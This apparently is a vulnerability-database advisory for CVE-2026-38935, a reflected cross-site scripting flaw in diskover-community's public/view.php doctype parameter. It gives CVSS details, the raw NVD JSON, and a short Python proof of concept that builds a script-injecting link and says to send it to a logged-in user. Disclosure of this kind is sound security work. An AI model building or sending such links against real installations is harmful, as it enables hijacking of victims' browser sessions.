Security Vulnerability Report
中文
CVE-2026-38935 CVSS 6.1 MEDIUM

CVE-2026-38935

Published: 2026-04-27 17:16:43
Last Modified: 2026-04-27 18:35:54

Description

A reflected cross-site scripting (XSS) vulnerability exists in diskover-community <= 2.3.5 in public/view.php via the doctype parameter

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

diskover-community <= 2.3.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC Code for CVE-2026-38935 # Reflects XSS via the 'doctype' parameter in public/view.php import urllib.parse # Target URL structure target_base = "http://target-host/diskover/public/view.php" # Malicious payload to inject JavaScript xss_payload = "<script>alert('CVE-2026-38935_PoC');</script>" # Encode payload for URL encoded_payload = urllib.parse.quote(xss_payload) # Construct the full malicious URL malicious_link = f"{target_base}?doctype={encoded_payload}" print(f"[+] Exploit Link: {malicious_link}") print("[+] Send this link to an authenticated user to trigger the XSS.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-38935", "sourceIdentifier": "[email protected]", "published": "2026-04-27T17:16:43.140", "lastModified": "2026-04-27T18:35:53.583", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A reflected cross-site scripting (XSS) vulnerability exists in diskover-community <= 2.3.5 in public/view.php via the doctype parameter"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "http://diskover-community.com", "source": "[email protected]"}, {"url": "http://diskoverdata.com", "source": "[email protected]"}, {"url": "https://github.com/VadlaReddySai/diskoverdata-cve-writeups/blob/main/CVE-2026-38935", "source": "[email protected]"}, {"url": "https://github.com/VadlaReddySai/diskoverdata-cve-writeups/blob/main/CVE-2026-38935", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}